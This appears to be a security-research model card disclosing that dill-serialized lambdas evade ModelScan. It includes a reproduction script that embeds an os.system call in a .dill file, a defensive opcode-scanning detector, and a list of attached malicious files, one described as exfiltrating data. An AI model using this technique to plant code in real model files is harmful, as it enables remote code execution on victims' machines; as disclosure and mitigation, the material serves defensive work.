license: mit
tags:
  - security-research
  - modelscan-bypass

ModelScan Dill Bytecode Bypass PoC

Summary

Dill serializes lambdas and closures by value: the function body is stored in the file as a compiled Python code object. ModelScan checks the module names referenced by pickle GLOBAL opcodes against a blocklist, but dill embeds the actual dangerous calls (os.system, subprocess, etc.) inside raw bytecode, which the scanner cannot analyze.
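To make the point concrete, the sketch below inspects a lambda's code object using only the standard library. It does not involve dill or modelscan and never calls the lambda; it only shows that the call target and the command string are ordinary fields of the code object, which is the part dill stores as bytes.

```python
import os

# Same lambda as in the reproduction; it is defined here but never called.
evil = lambda: os.system('echo PWNED')

code = evil.__code__

# Names the bytecode resolves at call time. The reference to os.system
# is recorded here, not in a pickle GLOBAL opcode.
print(code.co_names)

# Constants used by the bytecode, including the shell command string.
print(code.co_consts)

# The instructions themselves are an opaque byte string.
print(len(code.co_code), "bytes of raw bytecode")
```

A scanner that only matches module names in pickle opcodes has no reason to look inside these fields.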

Vulnerability

Format: .dill (dill serialization)
Scanner: modelscan 0.7.6 / 0.8.8
Result: "No issues found"
Impact: Full RCE. Any Python code can be embedded in a lambda/closure, and it runs when the loaded object is called.

Root Cause

Dill uses dill._dill._create_function and dill._dill._create_code to reconstruct functions from serialized bytecode. These helpers live in the dill._dill module, which is not in modelscan's blocklist. More critically, the actual dangerous code (os.system, subprocess.call, etc.) is embedded as compiled Python bytecode bytes, not as pickle GLOBAL references. ModelScan's approach of checking module names in pickle opcodes fundamentally cannot detect code hidden in bytecode objects.
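One possible mitigation is to treat the reconstruction helpers themselves as a signal. The following is a minimal sketch, not modelscan's implementation: it walks the opcode stream with the standard library's pickletools, without loading the file, and reports whether either helper named above is imported. The names RECONSTRUCTORS, global_refs, and uses_bytecode_reconstruction are hypothetical, and the memo tracking is a simplification that a deliberately crafted pickle could evade.

```python
import pickletools

# Hypothetical watchlist: the dill helpers that rebuild functions from bytecode.
RECONSTRUCTORS = {
    ("dill._dill", "_create_function"),
    ("dill._dill", "_create_code"),
}

STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def global_refs(data: bytes) -> set:
    """Collect (module, name) pairs a pickle stream imports, without loading it."""
    refs = set()
    memo = {}     # memo index -> string, or None for non-string objects
    strings = []  # strings placed on the stack so far, in order
    last = None   # string produced by the previous op, else None
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name == "MEMOIZE":          # stores the top of stack at the next index
            memo[len(memo)] = last
            continue
        if name in PUT_OPS:            # stores the top of stack at an explicit index
            memo[arg] = last
            continue
        last = None
        if name in STRING_OPS:
            last = arg
        elif name in GET_OPS:          # a memoized string may be reused here
            last = memo.get(arg)
        elif name in ("GLOBAL", "INST"):
            module, _, attr = arg.partition(" ")
            refs.add((module, attr))
        elif name == "STACK_GLOBAL" and len(strings) >= 2:
            refs.add((strings[-2], strings[-1]))
        if isinstance(last, str):
            strings.append(last)
    return refs


def uses_bytecode_reconstruction(data: bytes) -> bool:
    """True if the stream imports a helper that rebuilds code from raw bytes."""
    return bool(global_refs(data) & RECONSTRUCTORS)
```

Reading a file's bytes and passing them to uses_bytecode_reconstruction should flag a dill file that contains a by-value function. This only says that embedded bytecode is present, not what it does, so a scanner taking this route would likely have to treat any such file as unsafe.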

Reproduction

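import os

import dill

# Create a lambda whose body runs a shell command
evil = lambda: os.system('echo PWNED')

# Serialize it with dill, closing the file handle afterwards
with open('evil.dill', 'wb') as f:
    dill.dump(evil, f)

# Scan: modelscan reports "No issues found"
# modelscan scan -p evil.dill

# Load, then call: the embedded command executes
with open('evil.dill', 'rb') as f:
    loaded = dill.load(f)
loaded()  # prints PWNED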

Files

malicious_model.dill — Lambda calling os.system
exfiltration_model.dill — Lambda with data exfiltration payload